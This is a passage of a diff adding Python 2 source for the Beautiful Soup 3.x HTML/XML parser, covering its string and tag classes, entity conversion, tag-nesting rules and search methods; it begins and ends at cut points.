NavigableString(unicode, PageElement): + + def __new__(cls, value): + """Create a new NavigableString. + + When unpickling a NavigableString, this method is called with + the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be + passed in to the superclass's __new__ or the superclass won't know + how to handle non-ASCII characters. + """ + if isinstance(value, unicode): + return unicode.__new__(cls, value) + return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) + + def __getnewargs__(self): + return (unicode(self),) + + def __getattr__(self, attr): + """text.string gives you text. This is for backwards + compatibility for Navigable*String, but for CData* it lets you + get the string without the CData wrapper.""" + if attr == 'string': + return self + else: + raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) + + def encode(self, encoding=DEFAULT_OUTPUT_ENCODING): + return self.decode().encode(encoding) + + def decodeGivenEventualEncoding(self, eventualEncoding): + return self + +class CData(NavigableString): + + def decodeGivenEventualEncoding(self, eventualEncoding): + return u'<![CDATA[' + self + u']]>' + +class ProcessingInstruction(NavigableString): + + def decodeGivenEventualEncoding(self, eventualEncoding): + output = self + if u'%SOUP-ENCODING%' in output: + output = self.substituteEncoding(output, eventualEncoding) + return u'<?' + output + u'?>' + +class Comment(NavigableString): + def decodeGivenEventualEncoding(self, eventualEncoding): + return u'<!--' + self + u'-->' + +class Declaration(NavigableString): + def decodeGivenEventualEncoding(self, eventualEncoding): + return u'<!' + self + u'>' + +class Tag(PageElement): + + """Represents a found HTML tag with its attributes and contents.""" + + def _invert(h): + "Cheap function to invert a hash." + i = {} + for k,v in h.items(): + i[v] = k + return i + + XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", + "quot" : '"', + "amp" : "&", + "lt" : "<", + "gt" : ">" } + + XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) + + def _convertEntities(self, match): + """Used in a call to re.sub to replace HTML, XML, and numeric + entities with the appropriate Unicode characters. If HTML + entities are being converted, any unrecognized entities are + escaped.""" + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) + + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + else: + return u'&%s;' % x + + def __init__(self, parser, name, attrs=None, parent=None, + previous=None): + "Basic constructor." + + # We don't actually store the parser object: that lets extracted + # chunks be garbage-collected + self.parserClass = parser.__class__ + self.isSelfClosing = parser.isSelfClosingTag(name) + self.name = name + if attrs == None: + attrs = [] + self.attrs = attrs + self.contents = [] + self.setup(parent, previous) + self.hidden = False + self.containsSubstitutions = False + self.convertHTMLEntities = parser.convertHTMLEntities + self.convertXMLEntities = parser.convertXMLEntities + self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities + + def convert(kval): + "Converts HTML, XML and numeric entities in the attribute value." + k, val = kval + if val is None: + return kval + return (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", + self._convertEntities, val)) + self.attrs = map(convert, self.attrs) + + def get(self, key, default=None): + """Returns the value of the 'key' attribute for the tag, or + the value given for 'default' if it doesn't have that + attribute.""" + return self._getAttrMap().get(key, default) + + def has_key(self, key): + return self._getAttrMap().has_key(key) + + def __getitem__(self, key): + """tag[key] returns the value of the 'key' attribute for the tag, + and throws an exception if it's not there.""" + return self._getAttrMap()[key] + + def __iter__(self): + "Iterating over a tag iterates over its contents." + return iter(self.contents) + + def __len__(self): + "The length of a tag is the length of its list of contents." + return len(self.contents) + + def __contains__(self, x): + return x in self.contents + + def __nonzero__(self): + "A tag is non-None even if it has no contents." + return True + + def __setitem__(self, key, value): + """Setting tag[key] sets the value of the 'key' attribute for the + tag.""" + self._getAttrMap() + self.attrMap[key] = value + found = False + for i in range(0, len(self.attrs)): + if self.attrs[i][0] == key: + self.attrs[i] = (key, value) + found = True + if not found: + self.attrs.append((key, value)) + self._getAttrMap()[key] = value + + def __delitem__(self, key): + "Deleting tag[key] deletes all 'key' attributes for the tag." + for item in self.attrs: + if item[0] == key: + self.attrs.remove(item) + #We don't break because bad HTML can define the same + #attribute multiple times. + self._getAttrMap() + if self.attrMap.has_key(key): + del self.attrMap[key] + + def __call__(self, *args, **kwargs): + """Calling a tag like a function is the same as calling its + findAll() method. Eg. tag('a') returns a list of all the A tags + found within this tag.""" + return apply(self.findAll, args, kwargs) + + def __getattr__(self, tag): + #print "Getattr %s.%s" % (self.__class__, tag) + if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: + return self.find(tag[:-3]) + elif tag.find('__') != 0: + return self.find(tag) + raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) + + def __eq__(self, other): + """Returns true iff this tag has the same name, the same attributes, + and the same contents (recursively) as the given tag. + + NOTE: right now this will return false if two tags have the + same attributes in a different order. Should this be fixed?""" + if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): + return False + for i in range(0, len(self.contents)): + if self.contents[i] != other.contents[i]: + return False + return True + + def __ne__(self, other): + """Returns true iff this tag is not identical to the other tag, + as defined in __eq__.""" + return not self == other + + def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): + """Renders this tag as a string.""" + return self.decode(eventualEncoding=encoding) + + BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + + ")") + + def _sub_entity(self, x): + """Used with a regular expression to substitute the + appropriate XML entity for an XML special character.""" + return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" + + def __unicode__(self): + return self.decode() + + def __str__(self): + return self.encode() + + def encode(self, encoding=DEFAULT_OUTPUT_ENCODING, + prettyPrint=False, indentLevel=0): + return self.decode(prettyPrint, indentLevel, encoding).encode(encoding) + + def decode(self, prettyPrint=False, indentLevel=0, + eventualEncoding=DEFAULT_OUTPUT_ENCODING): + """Returns a string or Unicode representation of this tag and + its contents. To get Unicode, pass None for encoding.""" + + attrs = [] + if self.attrs: + for key, val in self.attrs: + fmt = '%s="%s"' + if isString(val): + if (self.containsSubstitutions + and eventualEncoding is not None + and '%SOUP-ENCODING%' in val): + val = self.substituteEncoding(val, eventualEncoding) + + # The attribute value either: + # + # * Contains no embedded double quotes or single quotes. + # No problem: we enclose it in double quotes. + # * Contains embedded single quotes. No problem: + # double quotes work here too. + # * Contains embedded double quotes. No problem: + # we enclose it in single quotes. + # * Embeds both single _and_ double quotes. This + # can't happen naturally, but it can happen if + # you modify an attribute value after parsing + # the document. Now we have a bit of a + # problem. We solve it by enclosing the + # attribute in single quotes, and escaping any + # embedded single quotes to XML entities. + if '"' in val: + fmt = "%s='%s'" + if "'" in val: + # TODO: replace with apos when + # appropriate. + val = val.replace("'", "&squot;") + + # Now we're okay w/r/t quotes. But the attribute + # value might also contain angle brackets, or + # ampersands that aren't part of entities. We need + # to escape those to XML entities too. + val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) + if val is None: + # Handle boolean attributes. + decoded = key + else: + decoded = fmt % (key, val) + attrs.append(decoded) + close = '' + closeTag = '' + if self.isSelfClosing: + close = ' /' + else: + closeTag = '</%s>' % self.name + + indentTag, indentContents = 0, 0 + if prettyPrint: + indentTag = indentLevel + space = (' ' * (indentTag-1)) + indentContents = indentTag + 1 + contents = self.decodeContents(prettyPrint, indentContents, + eventualEncoding) + if self.hidden: + s = contents + else: + s = [] + attributeString = '' + if attrs: + attributeString = ' ' + ' '.join(attrs) + if prettyPrint: + s.append(space) + s.append('<%s%s%s>' % (self.name, attributeString, close)) + if prettyPrint: + s.append("\n") + s.append(contents) + if prettyPrint and contents and contents[-1] != "\n": + s.append("\n") + if prettyPrint and closeTag: + s.append(space) + s.append(closeTag) + if prettyPrint and closeTag and self.nextSibling: + s.append("\n") + s = ''.join(s) + return s + + def decompose(self): + """Recursively destroys the contents of this tree.""" + contents = [i for i in self.contents] + for i in contents: + if isinstance(i, Tag): + i.decompose() + else: + i.extract() + self.extract() + + def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): + return self.encode(encoding, True) + + def encodeContents(self, encoding=DEFAULT_OUTPUT_ENCODING, + prettyPrint=False, indentLevel=0): + return self.decodeContents(prettyPrint, indentLevel).encode(encoding) + + def decodeContents(self, prettyPrint=False, indentLevel=0, + eventualEncoding=DEFAULT_OUTPUT_ENCODING): + """Renders the contents of this tag as a string in the given + encoding. If encoding is None, returns a Unicode string..""" + s=[] + for c in self: + text = None + if isinstance(c, NavigableString): + text = c.decodeGivenEventualEncoding(eventualEncoding) + elif isinstance(c, Tag): + s.append(c.decode(prettyPrint, indentLevel, eventualEncoding)) + if text and prettyPrint: + text = text.strip() + if text: + if prettyPrint: + s.append(" " * (indentLevel-1)) + s.append(text) + if prettyPrint: + s.append("\n") + return ''.join(s) + + #Soup methods + + def find(self, name=None, attrs={}, recursive=True, text=None, + **kwargs): + """Return only the first child of this Tag matching the given + criteria.""" + r = None + l = self.findAll(name, attrs, recursive, text, 1, **kwargs) + if l: + r = l[0] + return r + findChild = find + + def findAll(self, name=None, attrs={}, recursive=True, text=None, + limit=None, **kwargs): + """Extracts a list of Tag objects that match the given + criteria. You can specify the name of the Tag and any + attributes you want the Tag to have. + + The value of a key-value pair in the 'attrs' map can be a + string, a list of strings, a regular expression object, or a + callable that takes a string and returns whether or not the + string matches for some custom definition of 'matches'. The + same is true of the tag name.""" + generator = self.recursiveChildGenerator + if not recursive: + generator = self.childGenerator + return self._findAll(name, attrs, text, limit, generator, **kwargs) + findChildren = findAll + + # Pre-3.x compatibility methods. Will go away in 4.0. + first = find + fetch = findAll + + def fetchText(self, text=None, recursive=True, limit=None): + return self.findAll(text=text, recursive=recursive, limit=limit) + + def firstText(self, text=None, recursive=True): + return self.find(text=text, recursive=recursive) + + # 3.x compatibility methods. Will go away in 4.0. + def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, + prettyPrint=False, indentLevel=0): + if encoding is None: + return self.decodeContents(prettyPrint, indentLevel, encoding) + else: + return self.encodeContents(encoding, prettyPrint, indentLevel) + + + #Private methods + + def _getAttrMap(self): + """Initializes a map representation of this tag's attributes, + if not already initialized.""" + if not getattr(self, 'attrMap'): + self.attrMap = {} + for (key, value) in self.attrs: + self.attrMap[key] = value + return self.attrMap + + #Generator methods + def recursiveChildGenerator(self): + if not len(self.contents): + raise StopIteration + stopNode = self._lastRecursiveChild().next + current = self.contents[0] + while current is not stopNode: + yield current + current = current.next + + def childGenerator(self): + if not len(self.contents): + raise StopIteration + current = self.contents[0] + while current: + yield current + current = current.nextSibling + raise StopIteration + +# Next, a couple classes to represent queries and their results. +class SoupStrainer: + """Encapsulates a number of ways of matching a markup element (tag or + text).""" + + def __init__(self, name=None, attrs={}, text=None, **kwargs): + self.name = name + if isString(attrs): + kwargs['class'] = attrs + attrs = None + if kwargs: + if attrs: + attrs = attrs.copy() + attrs.update(kwargs) + else: + attrs = kwargs + self.attrs = attrs + self.text = text + + def __str__(self): + if self.text: + return self.text + else: + return "%s|%s" % (self.name, self.attrs) + + def searchTag(self, markupName=None, markupAttrs={}): + found = None + markup = None + if isinstance(markupName, Tag): + markup = markupName + markupAttrs = markup + callFunctionWithTagData = callable(self.name) \ + and not isinstance(markupName, Tag) + + if (not self.name) \ + or callFunctionWithTagData \ + or (markup and self._matches(markup, self.name)) \ + or (not markup and self._matches(markupName, self.name)): + if callFunctionWithTagData: + match = self.name(markupName, markupAttrs) + else: + match = True + markupAttrMap = None + for attr, matchAgainst in self.attrs.items(): + if not markupAttrMap: + if hasattr(markupAttrs, 'get'): + markupAttrMap = markupAttrs + else: + markupAttrMap = {} + for k,v in markupAttrs: + markupAttrMap[k] = v + attrValue = markupAttrMap.get(attr) + if not self._matches(attrValue, matchAgainst): + match = False + break + if match: + if markup: + found = markup + else: + found = markupName + return found + + def search(self, markup): + #print 'looking for %s in %s' % (self, markup) + found = None + # If given a list of items, scan it for a text element that + # matches. + if isList(markup) and not isinstance(markup, Tag): + for element in markup: + if isinstance(element, NavigableString) \ + and self.search(element): + found = element + break + # If it's a Tag, make sure its name or attributes match. + # Don't bother with Tags if we're searching for text. + elif isinstance(markup, Tag): + if not self.text: + found = self.searchTag(markup) + # If it's text, make sure the text matches. + elif isinstance(markup, NavigableString) or \ + isString(markup): + if self._matches(markup, self.text): + found = markup + else: + raise Exception, "I don't know how to match against a %s" \ + % markup.__class__ + return found + + def _matches(self, markup, matchAgainst): + #print "Matching %s against %s" % (markup, matchAgainst) + result = False + if matchAgainst == True and type(matchAgainst) == types.BooleanType: + result = markup != None + elif callable(matchAgainst): + result = matchAgainst(markup) + else: + #Custom match methods take the tag as an argument, but all + #other ways of matching match the tag name as a string. + if isinstance(markup, Tag): + markup = markup.name + if markup is not None and not isString(markup): + markup = unicode(markup) + #Now we know that chunk is either a string, or None. + if hasattr(matchAgainst, 'match'): + # It's a regexp object. + result = markup and matchAgainst.search(markup) + elif (isList(matchAgainst) + and (markup is not None or not isString(matchAgainst))): + result = markup in matchAgainst + elif hasattr(matchAgainst, 'items'): + result = markup.has_key(matchAgainst) + elif matchAgainst and isString(markup): + if isinstance(markup, unicode): + matchAgainst = unicode(matchAgainst) + else: + matchAgainst = str(matchAgainst) + + if not result: + result = matchAgainst == markup + return result + +class ResultSet(list): + """A ResultSet is just a list that keeps track of the SoupStrainer + that created it.""" + def __init__(self, source): + list.__init__([]) + self.source = source + +# Now, some helper functions. + +def isList(l): + """Convenience method that works with all 2.x versions of Python + to determine whether or not something is listlike.""" + return ((hasattr(l, '__iter__') and not isString(l)) + or (type(l) in (types.ListType, types.TupleType))) + +def isString(s): + """Convenience method that works with all 2.x versions of Python + to determine whether or not something is stringlike.""" + try: + return isinstance(s, unicode) or isinstance(s, basestring) + except NameError: + return isinstance(s, str) + +def buildTagMap(default, *args): + """Turns a list of maps, lists, or scalars into a single map. + Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and + NESTING_RESET_TAGS maps out of lists and partial maps.""" + built = {} + for portion in args: + if hasattr(portion, 'items'): + #It's a map. Merge it. + for k,v in portion.items(): + built[k] = v + elif isList(portion) and not isString(portion): + #It's a list. Map each item to the default. + for k in portion: + built[k] = default + else: + #It's a scalar. Map it to the default. + built[portion] = default + return built + +# Now, the parser classes. + +class HTMLParserBuilder(HTMLParser): + + def __init__(self, soup): + HTMLParser.__init__(self) + self.soup = soup + + # We inherit feed() and reset(). + + def handle_starttag(self, name, attrs): + if name == 'meta': + self.soup.extractCharsetFromMeta(attrs) + else: + self.soup.unknown_starttag(name, attrs) + + def handle_endtag(self, name): + self.soup.unknown_endtag(name) + + def handle_data(self, content): + self.soup.handle_data(content) + + def _toStringSubclass(self, text, subclass): + """Adds a certain piece of text to the tree as a NavigableString + subclass.""" + self.soup.endData() + self.handle_data(text) + self.soup.endData(subclass) + + def handle_pi(self, text): + """Handle a processing instruction as a ProcessingInstruction + object, possibly one with a %SOUP-ENCODING% slot into which an + encoding will be plugged later.""" + if text[:3] == "xml": + text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" + self._toStringSubclass(text, ProcessingInstruction) + + def handle_comment(self, text): + "Handle comments as Comment objects." + self._toStringSubclass(text, Comment) + + def handle_charref(self, ref): + "Handle character references as data." + if self.soup.convertEntities: + data = unichr(int(ref)) + else: + data = '&#%s;' % ref + self.handle_data(data) + + def handle_entityref(self, ref): + """Handle entity references as data, possibly converting known + HTML and/or XML entity references to the corresponding Unicode + characters.""" + data = None + if self.soup.convertHTMLEntities: + try: + data = unichr(name2codepoint[ref]) + except KeyError: + pass + + if not data and self.soup.convertXMLEntities: + data = self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) + + if not data and self.soup.convertHTMLEntities and \ + not self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): + # TODO: We've got a problem here. We're told this is + # an entity reference, but it's not an XML entity + # reference or an HTML entity reference. Nonetheless, + # the logical thing to do is to pass it through as an + # unrecognized entity reference. + # + # Except: when the input is "&carol;" this function + # will be called with input "carol". When the input is + # "AT&T", this function will be called with input + # "T". We have no way of knowing whether a semicolon + # was present originally, so we don't know whether + # this is an unknown entity or just a misplaced + # ampersand. + # + # The more common case is a misplaced ampersand, so I + # escape the ampersand and omit the trailing semicolon. + data = "&%s" % ref + if not data: + # This case is different from the one above, because we + # haven't already gone through a supposedly comprehensive + # mapping of entities to Unicode characters. We might not + # have gone through any mapping at all. So the chances are + # very high that this is a real entity, and not a + # misplaced ampersand. + data = "&%s;" % ref + self.handle_data(data) + + def handle_decl(self, data): + "Handle DOCTYPEs and the like as Declaration objects." + self._toStringSubclass(data, Declaration) + + def parse_declaration(self, i): + """Treat a bogus SGML declaration as raw data. Treat a CDATA + declaration as a CData object.""" + j = None + if self.rawdata[i:i+9] == '<![CDATA[': + k = self.rawdata.find(']]>', i) + if k == -1: + k = len(self.rawdata) + data = self.rawdata[i+9:k] + j = k+3 + self._toStringSubclass(data, CData) + else: + try: + j = HTMLParser.parse_declaration(self, i) + except HTMLParseError: + toHandle = self.rawdata[i:] + self.handle_data(toHandle) + j = i + len(toHandle) + return j + + +class BeautifulStoneSoup(Tag): + + """This class contains the basic parser and search code. It defines + a parser that knows nothing about tag behavior except for the + following: + + You can't close a tag without closing all the tags it encloses. + That is, "<foo><bar></foo>" actually means + "<foo><bar></bar></foo>". + + [Another possible explanation is "<foo><bar /></foo>", but since + this class defines no SELF_CLOSING_TAGS, it will never use that + explanation.] + + This class is useful for parsing XML or made-up markup languages, + or when BeautifulSoup makes an assumption counter to what you were + expecting.""" + + SELF_CLOSING_TAGS = {} + NESTABLE_TAGS = {} + RESET_NESTING_TAGS = {} + QUOTE_TAGS = {} + PRESERVE_WHITESPACE_TAGS = [] + + MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), + lambda x: x.group(1) + ' />'), + (re.compile('<!\s+([^<>]*)>'), + lambda x: '<!' + x.group(1) + '>') + ] + + ROOT_TAG_NAME = u'[document]' + + HTML_ENTITIES = "html" + XML_ENTITIES = "xml" + XHTML_ENTITIES = "xhtml" + # TODO: This only exists for backwards-compatibility + ALL_ENTITIES = XHTML_ENTITIES + + # Used when determining whether a text node is all whitespace and + # can be replaced with a single space. A text node that contains + # fancy Unicode spaces (usually non-breaking) should be left + # alone. + STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } + + def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, + markupMassage=True, smartQuotesTo=XML_ENTITIES, + convertEntities=None, selfClosingTags=None, isHTML=False, + builder=HTMLParserBuilder): + """The Soup object is initialized as the 'root tag', and the + provided markup (which can be a string or a file-like object) + is fed into the underlying parser. + + HTMLParser will process most bad HTML, and the BeautifulSoup + class has some tricks for dealing with some HTML that kills + HTMLParser, but Beautiful Soup can nonetheless choke or lose data + if your data uses self-closing tags or declarations + incorrectly. + + By default, Beautiful Soup uses regexes to sanitize input, + avoiding the vast majority of these problems. If the problems + don't apply to you, pass in False for markupMassage, and + you'll get better performance. + + The default parser massage techniques fix the two most common + instances of invalid HTML that choke HTMLParser: + + <br/> (No space between name of closing tag and tag close) + <! --Comment--> (Extraneous whitespace in declaration) + + You can pass in a custom list of (RE object, replace method) + tuples to get Beautiful Soup to scrub your input the way you + want.""" + + self.parseOnlyThese = parseOnlyThese + self.fromEncoding = fromEncoding + self.smartQuotesTo = smartQuotesTo + self.convertEntities = convertEntities + # Set the rules for how we'll deal with the entities we + # encounter + if self.convertEntities: + # It doesn't make sense to convert encoded characters to + # entities even while you're converting entities to Unicode. + # Just convert it all to Unicode. + self.smartQuotesTo = None + if convertEntities == self.HTML_ENTITIES: + self.convertXMLEntities = False + self.convertHTMLEntities = True + self.escapeUnrecognizedEntities = True + elif convertEntities == self.XHTML_ENTITIES: + self.convertXMLEntities = True + self.convertHTMLEntities = True + self.escapeUnrecognizedEntities = False + elif convertEntities == self.XML_ENTITIES: + self.convertXMLEntities = True + self.convertHTMLEntities = False + self.escapeUnrecognizedEntities = False + else: + self.convertXMLEntities = False + self.convertHTMLEntities = False + self.escapeUnrecognizedEntities = False + + self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) + self.builder = builder(self) + self.reset() + + if hasattr(markup, 'read'): # It's a file-type object. + markup = markup.read() + self.markup = markup + self.markupMassage = markupMassage + try: + self._feed(isHTML=isHTML) + except StopParsing: + pass + self.markup = None # The markup can now be GCed. + self.builder = None # So can the builder. + + def _feed(self, inDocumentEncoding=None, isHTML=False): + # Convert the document to Unicode. + markup = self.markup + if isinstance(markup, unicode): + if not hasattr(self, 'originalEncoding'): + self.originalEncoding = None + else: + dammit = UnicodeDammit\ + (markup, [self.fromEncoding, inDocumentEncoding], + smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) + markup = dammit.unicode + self.originalEncoding = dammit.originalEncoding + self.declaredHTMLEncoding = dammit.declaredHTMLEncoding + if markup: + if self.markupMassage: + if not isList(self.markupMassage): + self.markupMassage = self.MARKUP_MASSAGE + for fix, m in self.markupMassage: + markup = fix.sub(m, markup) + # TODO: We get rid of markupMassage so that the + # soup object can be deepcopied later on. Some + # Python installations can't copy regexes. If anyone + # was relying on the existence of markupMassage, this + # might cause problems. + del(self.markupMassage) + self.builder.reset() + + self.builder.feed(markup) + # Close out any unfinished strings and close all the open tags. + self.endData() + while self.currentTag.name != self.ROOT_TAG_NAME: + self.popTag() + + def isSelfClosingTag(self, name): + """Returns true iff the given string is the name of a + self-closing tag according to this parser.""" + return self.SELF_CLOSING_TAGS.has_key(name) \ + or self.instanceSelfClosingTags.has_key(name) + + def reset(self): + Tag.__init__(self, self, self.ROOT_TAG_NAME) + self.hidden = 1 + self.builder.reset() + self.currentData = [] + self.currentTag = None + self.tagStack = [] + self.quoteStack = [] + self.pushTag(self) + + def popTag(self): + tag = self.tagStack.pop() + # Tags with just one string-owning child get the child as a + # 'string' property, so that soup.tag.string is shorthand for + # soup.tag.contents[0] + if len(self.currentTag.contents) == 1 and \ + isinstance(self.currentTag.contents[0], NavigableString): + self.currentTag.string = self.currentTag.contents[0] + + #print "Pop", tag.name + if self.tagStack: + self.currentTag = self.tagStack[-1] + return self.currentTag + + def pushTag(self, tag): + #print "Push", tag.name + if self.currentTag: + self.currentTag.contents.append(tag) + self.tagStack.append(tag) + self.currentTag = self.tagStack[-1] + + def endData(self, containerClass=NavigableString): + if self.currentData: + currentData = u''.join(self.currentData) + if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and + not set([tag.name for tag in self.tagStack]).intersection( + self.PRESERVE_WHITESPACE_TAGS)): + if '\n' in currentData: + currentData = '\n' + else: + currentData = ' ' + self.currentData = [] + if self.parseOnlyThese and len(self.tagStack) <= 1 and \ + (not self.parseOnlyThese.text or \ + not self.parseOnlyThese.search(currentData)): + return + o = containerClass(currentData) + o.setup(self.currentTag, self.previous) + if self.previous: + self.previous.next = o + self.previous = o + self.currentTag.contents.append(o) + + + def _popToTag(self, name, inclusivePop=True): + """Pops the tag stack up to and including the most recent + instance of the given tag. If inclusivePop is false, pops the tag + stack up to but *not* including the most recent instqance of + the given tag.""" + #print "Popping to %s" % name + if name == self.ROOT_TAG_NAME: + return + + numPops = 0 + mostRecentTag = None + for i in range(len(self.tagStack)-1, 0, -1): + if name == self.tagStack[i].name: + numPops = len(self.tagStack)-i + break + if not inclusivePop: + numPops = numPops - 1 + + for i in range(0, numPops): + mostRecentTag = self.popTag() + return mostRecentTag + + def _smartPop(self, name): + + """We need to pop up to the previous tag of this type, unless + one of this tag's nesting reset triggers comes between this + tag and the previous tag of this type, OR unless this tag is a + generic nesting trigger and another generic nesting trigger + comes between this tag and the previous tag of this type. + + Examples: + <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. + <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. + <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. + + <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. + <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' + <td><tr><td> *<td>* should pop to 'tr', not the first 'td' + """ + + nestingResetTriggers = self.NESTABLE_TAGS.get(name) + isNestable = nestingResetTriggers != None + isResetNesting = self.RESET_NESTING_TAGS.has_key(name) + popTo = None + inclusive = True + for i in range(len(self.tagStack)-1, 0, -1): + p = self.tagStack[i] + if (not p or p.name == name) and not isNestable: + #Non-nestable tags get popped to the top or to their + #last occurance. + popTo = name + break + if (nestingResetTriggers != None + and p.name in nestingResetTriggers) \ + or (nestingResetTriggers == None and isResetNesting + and self.RESET_NESTING_TAGS.has_key(p.name)): + + #If we encounter one of the nesting reset triggers + #peculiar to this tag, or we encounter another tag + #that causes nesting to reset, pop up to but not + #including that tag. + popTo = p.name + inclusive = False + break + p = p.parent + if popTo: + self._popToTag(popTo, inclusive) + + def unknown_starttag(self, name, attrs, selfClosing=0): + #print "Start tag %s: %s" % (name, attrs) + if self.quoteStack: + #This is not a real tag. + #print "<%s> is not real!" % name + attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs)) + self.handle_data('<%s%s>' % (name, attrs)) + return + self.endData() + + if not self.isSelfClosingTag(name) and not selfClosing: + self._smartPop(name) + + if self.parseOnlyThese and len(self.tagStack) <= 1 \ + and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): + return + + tag = Tag(self, name, attrs, self.currentTag, self.previous) + if self.previous: + self.previous.next = tag + self.previous = tag + self.pushTag(tag) + if selfClosing or self.isSelfClosingTag(name): + self.popTag() + if name in self.QUOTE_TAGS: + #print "Beginning quote (%s)" % name + self.quoteStack.append(name) + self.literal = 1 + return tag + + def unknown_endtag(self, name): + #print "End tag %s" % name + if self.quoteStack and self.quoteStack[-1] != name: + #This is not a real end tag. + #print "</%s> is not real!" % name + self.handle_data('</%s>' % name) + return + self.endData() + self._popToTag(name) + if self.quoteStack and self.quoteStack[-1] == name: + self.quoteStack.pop() + self.literal = (len(self.quoteStack) > 0) + + def handle_data(self, data): + self.currentData.append(data) + + def extractCharsetFromMeta(self, attrs): + self.unknown_starttag('meta', attrs) + + +class BeautifulSoup(BeautifulStoneSoup): + + """This parser knows the following facts about HTML: + + * Some tags have no closing tag and should be interpreted as being + closed as soon as they are encountered. + + * The text inside some tags (ie. 'script') may contain tags which + are not really part of the document and which should be parsed + as text, not tags. If you want to parse the text as tags, you can + always fetch it and parse it explicitly. + + * Tag nesting rules: + + Most tags can't be nested at all. For instance, the occurance of + a <p> tag should implicitly close the previous <p> tag. + + <p>Para1<p>Para2 + should be transformed into: + <p>Para1</p><p>Para2 + + Some tags can be nested arbitrarily. For instance, the occurance + of a <blockquote> tag should _not_ implicitly close the previous + <blockquote> tag. + + Alice said: <blockquote>Bob said: <blockquote>Blah + should NOT be transformed into: + Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah + + Some tags can be nested, but the nesting is reset by the + interposition of other tags. For instance, a <tr> tag should + implicitly close the previous <tr> tag within the same <table>, + but not close a <tr> tag in another table. + + <table><tr>Blah<tr>Blah + should be transformed into: + <table><tr>Blah</tr><tr>Blah + but, + <tr>Blah<table><tr>Blah + should NOT be transformed into + <tr>Blah<table></tr><tr>Blah + + Differing assumptions about tag nesting rules are a major source + of problems with the BeautifulSoup class. If BeautifulSoup is not + treating as nestable a tag your page author treats as nestable, + try ICantBelieveItsBeautifulSoup, MinimalSoup, or + BeautifulStoneSoup before writing your own subclass.""" + + def __init__(self, *args, **kwargs): + if not kwargs.has_key('smartQuotesTo'): + kwargs['smartQuotesTo'] = self.HTML_ENTITIES + kwargs['isHTML'] = True + BeautifulStoneSoup.__init__(self, *args, **kwargs) + + SELF_CLOSING_TAGS = buildTagMap(None, + ['br' , 'hr', 'input', 'img', 'meta', + 'spacer', 'link', 'frame', 'base']) + + PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) + + QUOTE_TAGS = {'script' : None, 'textarea' : None} + + #According to the HTML standard, each of these inline tags can + #contain another tag of the same type. Furthermore, it's common + #to actually use these tags this way. + NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', + 'center'] + + #According to the HTML standard, these block tags can contain + #another tag of the same type. Furthermore, it's common + #to actually use these tags this way. + NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del'] + + #Lists can contain other lists, but there are restrictions. + NESTABLE_LIST_TAGS = { 'ol' : [], + 'ul' : [], + 'li' : ['ul', 'ol'], + 'dl' : [], + 'dd' : ['dl'], + 'dt' : ['dl'] } + + #Tables can contain other tables, but there are restrictions. + NESTABLE_TABLE_TAGS = {'table' : [], + 'tr' : ['table', 'tbody', 'tfoot', 'thead'], + 'td' : ['tr'], + 'th' : ['tr'], + 'thead' : ['table'], + 'tbody' : ['table'], + 'tfoot' : ['table'], + } + + NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre'] + + #If one of these tags is encountered, all tags up to the next tag of + #this type are popped. + RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', + NON_NESTABLE_BLOCK_TAGS, + NESTABLE_LIST_TAGS, + NESTABLE_TABLE_TAGS) + + NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, + NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) + + # Used to detect the charset in a META tag; see start_meta + CHARSET_RE = 